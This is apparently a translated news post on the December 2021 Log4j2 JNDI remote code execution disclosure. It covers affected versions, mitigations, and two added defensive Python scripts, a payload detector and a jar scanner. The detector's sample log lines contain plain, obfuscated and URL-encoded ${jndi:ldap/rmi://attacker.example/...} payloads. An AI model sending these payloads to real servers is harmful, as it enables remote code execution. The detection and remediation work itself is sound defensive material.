
Ten hours ago, a remote code execution vulnerability in Apache Log4j2 was disclosed on the Internet. An attacker can exploit it by constructing a specially crafted request, which ultimately triggers remote code execution. According to analysis by "white hat" researchers, nearly all the technology giants, Baidu among them, are affected by this Log4j remote code execution vulnerability.

(According to the latest information from Apache, Log4j 2.15.0 has been updated and approved on the release page, and the official release is in progress.)

Since the Alibaba Cloud security team officially reported the Apache Log4j2 remote code execution vulnerability to Apache on November 24, details of the vulnerability have continued to spread on the Internet. Because Log4j2 performs recursive lookup substitution on parts of the messages it logs, an attacker can directly construct a malicious request that triggers the remote code execution vulnerability.

Apache Log4j2

Log4j was originally written by Ceki Gülcü and is part of the Apache Logging Services project of the Apache Software Foundation. Log4j is one of several Java logging frameworks, and Apache Log4j2 is its successor: compared with Log4j 1, it brings significant improvements and fixes some inherent problems in the Logback architecture.

Through the Apache Log4j2 framework, developers control the logging process by assigning a level to each log message.

At present, logging frameworks are widely used in business system development to record log information. In many cases, developers write error messages that contain user input into the log, and that is exactly the path this vulnerability travels.

Vulnerability description

The details of the Apache Log4j2 remote code execution vulnerability have been disclosed. Analysis shows that it is a Java JNDI injection vulnerability in the component: when the program logs data supplied by the user, Log4j2 resolves ${...} lookups embedded in the message text, including JNDI lookups that fetch an object from an attacker-controlled server. An attacker can therefore construct a special request that causes the lookup to run and use it to execute arbitrary code on the target server.
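To make the JNDI injection concrete, here is an added example that is not from the original post or the Log4j project: a small Python detector that mimics Log4j 2's nested lookup substitution (the lower/upper lookups and the ${key:-default} fallback) just far enough to collapse obfuscated payloads into their final ${jndi:scheme://host/...} form, then flags them in web-server access log lines. The log lines and the host attacker.example are constructed for this example and do not come from the page.

```python
import re
from urllib.parse import unquote

# Case-changing lookups that attackers use to hide the "jndi" prefix.
_CASE_LOOKUPS = {"lower": str.lower, "upper": str.upper}
JNDI_RE = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)


def _resolve(body):
    """Resolve one lookup body (inner lookups already resolved) the way
    Log4j's substitutor would, for the pieces that matter to detection."""
    prefix, sep, rest = body.partition(":")
    prefix = prefix.strip().lower()
    if prefix == "jndi":
        return "${jndi:" + rest + "}"          # keep the dangerous lookup visible
    if ":-" in body:
        return body.split(":-", 1)[1]          # ${unknown:-default} -> default
    if sep and prefix in _CASE_LOOKUPS:
        return _CASE_LOOKUPS[prefix](rest)
    return "${" + body + "}"                   # unknown lookup: leave untouched


def _parse(text, i, nested):
    """Walk text from i, resolving nested ${...} innermost-first.
    Returns (resolved_text, next_index), or (None, None) if a lookup is unterminated."""
    out = []
    while i < len(text):
        if text.startswith("${", i):
            inner, j = _parse(text, i + 2, True)
            if j is None:
                return None, None
            out.append(_resolve(inner))
            i = j
        elif nested and text[i] == "}":
            return "".join(out), i + 1
        else:
            out.append(text[i])
            i += 1
    return (None, None) if nested else ("".join(out), i)


def normalize(text):
    """URL-decode, then collapse nested lookups so obfuscated payloads read as their final form."""
    text = unquote(text)
    resolved, _ = _parse(text, 0, False)
    return text if resolved is None else resolved


def detect(line):
    """Return (scheme, normalized_lookup) if the line carries a JNDI lookup, else None."""
    norm = normalize(line)
    m = JNDI_RE.search(norm)
    if not m:
        return None
    end = norm.find("}", m.end())
    lookup = norm[m.start():] if end < 0 else norm[m.start():end + 1]
    return m.group(1).lower(), lookup


def scan(lines):
    """Run detect() over log lines; report 1-based line numbers of hits."""
    hits = []
    for n, line in enumerate(lines, 1):
        hit = detect(line)
        if hit:
            hits.append({"line": n, "scheme": hit[0], "lookup": hit[1]})
    return hits


# Constructed access-log lines (not real traffic): plain request, payload in the
# User-Agent, obfuscated payload in the query string, URL-encoded payload, and a
# benign ${...} that must not be flagged.
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [10/Dec/2021:03:12:45 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:03:12:46 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example:1389/a}"',
    '203.0.113.7 - - [10/Dec/2021:03:12:47 +0000] "GET /?x=${${lower:j}${::-n}${env:NaN:-d}i:${lower:l}${upper:d}ap://attacker.example/a} HTTP/1.1" 404 0',
    '203.0.113.9 - - [10/Dec/2021:03:12:48 +0000] "GET /?x=%24%7Bjndi%3Armi%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 404 0',
    '198.51.100.2 - - [10/Dec/2021:03:13:00 +0000] "GET /price?amt=${total} HTTP/1.1" 200 88 "-" "curl/7.68.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_ACCESS_LOG):
        print(hit)
```

Running the block prints one hit per line that carries a JNDI lookup. Matching on the literal string ${jndi: is not enough, because the same substitution that makes the bug exploitable also lets an attacker spell the prefix as ${${lower:j}ndi:...}; normalizing first closes that gap, while the benign ${total} in a URL is left alone. This is detection for log review and WAF rules only; the fix remains the upgrade.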

Affected version:

Apache Log4j 2.x, from 2.0-beta9 up to and including 2.14.1

Known affected applications and components:

  • spring-boot-starter-log4j2
  • Apache Solr
  • Apache Flink
  • Apache Druid

The industry has rated the Apache Log4j2 remote code execution vulnerability as high-risk: its reach is enormous and the bar to exploitation is extremely low. Many components and large-scale applications, such as Apache Solr, Apache Struts2, Apache Druid and Apache Flink, are reported to be affected, and protective measures should be taken as soon as possible.

Solution

Apache Log4j has now released a new version that fixes the vulnerability. Affected users should upgrade every application that uses Apache Log4j2 to the latest version, Log4j-2.15.0-rc2, and upgrade the applications and components known to be affected, such as spring-boot-starter-log4j2, Apache Solr, Apache Flink and Apache Druid.

Temporary mitigations (they disable message lookups and only work on Log4j 2.10 and later; older 2.x versions have to remove the JndiLookup class from log4j-core instead):

  • Add the JVM parameter -Dlog4j2.formatMsgNoLookups=true
  • Set log4j2.formatMsgNoLookups=true in log4j2.component.properties on the classpath, or set the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true
  • Both routes flip the internal constant FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS to true; verify it took effect by logging a test message that contains a lookup and checking that it is written out verbatim

Treat these as stop-gaps until the upgrade is done; the real fix is the new release.
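The following is an added example, not the page's or Apache's code, showing the remediation side in Python: walk a directory tree, find every log4j-core (including copies nested inside .war/.ear files), read its version from the Maven pom.properties, compare it against the affected range, and, for jars that cannot be upgraded yet, write a copy with JndiLookup.class removed, which is the equivalent of Apache's documented zip -q -d ... JndiLookup.class mitigation for versions before 2.10. The jar and war built in demo() are constructed fixtures with placeholder bytes, and the version check takes the page's 2.x <= 2.14.1 range as the affected range.

```python
import io
import os
import tempfile
import zipfile

# Entry names inside a real log4j-core jar.
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear")


def is_affected(version):
    """Affected range per the advisory: Log4j 2.x up to and including 2.14.1."""
    parts = version.split("-", 1)[0].split(".")      # "2.0-beta9" -> ["2", "0"]
    try:
        major, minor = int(parts[0]), int(parts[1])
    except (ValueError, IndexError):
        return True                                   # unparseable: treat as affected until checked by hand
    return major == 2 and minor <= 14


def _core_version(zf):
    for raw in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
        key, _, value = raw.partition("=")
        if key.strip() == "version":
            return value.strip()
    return None


def inspect_archive(source, label):
    """Report every log4j-core in an archive, descending into jars nested
    inside wars/ears (WEB-INF/lib), where forgotten copies usually live."""
    findings = []
    with zipfile.ZipFile(source) as zf:
        names = set(zf.namelist())
        has_jndi = JNDI_LOOKUP in names
        version = _core_version(zf) if POM_PROPS in names else None
        if version is not None or has_jndi:
            findings.append({"path": label, "version": version,
                             "affected": is_affected(version) if version else True,
                             "jndi_lookup_present": has_jndi})
        for name in sorted(names):
            if name.endswith(ARCHIVE_EXT):
                findings.extend(inspect_archive(io.BytesIO(zf.read(name)), f"{label}!/{name}"))
    return findings


def scan_tree(root):
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, name)
                findings.extend(inspect_archive(path, path))
    return findings


def remove_jndi_lookup(src, dst):
    """Copy src to dst without JndiLookup.class (same effect as
    zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class)."""
    with zipfile.ZipFile(src) as zin, zipfile.ZipFile(dst, "w") as zout:
        for item in zin.infolist():
            if item.filename != JNDI_LOOKUP:
                zout.writestr(item, zin.read(item.filename))


def build_fixture_jar(path, version="2.14.1"):
    """Constructed stand-in for log4j-core: real entry names, placeholder bytes."""
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe placeholder, not a real class file")
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe placeholder")


def demo():
    """Scan a constructed deployment before and after neutralizing the loose jar."""
    with tempfile.TemporaryDirectory() as root:
        lib = os.path.join(root, "app", "WEB-INF", "lib")
        os.makedirs(lib)
        vulnerable = os.path.join(lib, "log4j-core-2.14.1.jar")
        build_fixture_jar(vulnerable)
        with zipfile.ZipFile(os.path.join(root, "legacy.war"), "w") as war:   # nested copy
            war.write(vulnerable, "WEB-INF/lib/log4j-core-2.14.1.jar")
        before = scan_tree(root)
        remove_jndi_lookup(vulnerable, vulnerable + ".tmp")
        os.replace(vulnerable + ".tmp", vulnerable)
        after = scan_tree(root)
    return {"before": before, "after": after}


if __name__ == "__main__":
    for phase, findings in demo().items():
        for finding in findings:
            print(phase, finding)
```

Note what the second scan shows: the loose jar no longer contains JndiLookup.class but its version still reads as affected, and the copy inside legacy.war is untouched. A scanner keyed on version alone keeps flagging a neutralized jar, one keyed on the class alone misses the nested copy, so report both fields, patch or upgrade every copy, and re-scan after each deployment.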

I don't know how many times before I have heard about log4j vulnerabilities. Now a new 0day has been maliciously disclosed, and its impact is extremely wide.

According to the public information about the payload, a large number of websites around the world have been "captured" by this vulnerability, such as Baidu:

And iCloud:

As soon as the news of the vulnerability came out, it drew the attention of Java developers and security engineers across the industry.

Update:

According to the latest information from Apache, Log4j 2.15.0 has been updated on the release page:

<dependencies>
<dependency org="org.apache.logging.log4j" name="log4j-api" rev="2.15.0" />
<dependency org="org.apache.logging.log4j" name="log4j-core" rev="2.15.0" />
</dependencies>

Since the official release is still in progress, version 2.15.0 cannot yet be seen externally.

According to an Apache source, there are still 0 artifacts on Maven Central, and it may take several hours before the mirror servers synchronize and the release becomes official. We will keep following this for further updates.

Reference links
https://github.com/apache/logging-log4j2
https://repository.apache.org/service/local/repositories/releases/content/org/apache/logging/log4j/log4j-core/2.15.0/log4j-core-2.15.0.jar


MissD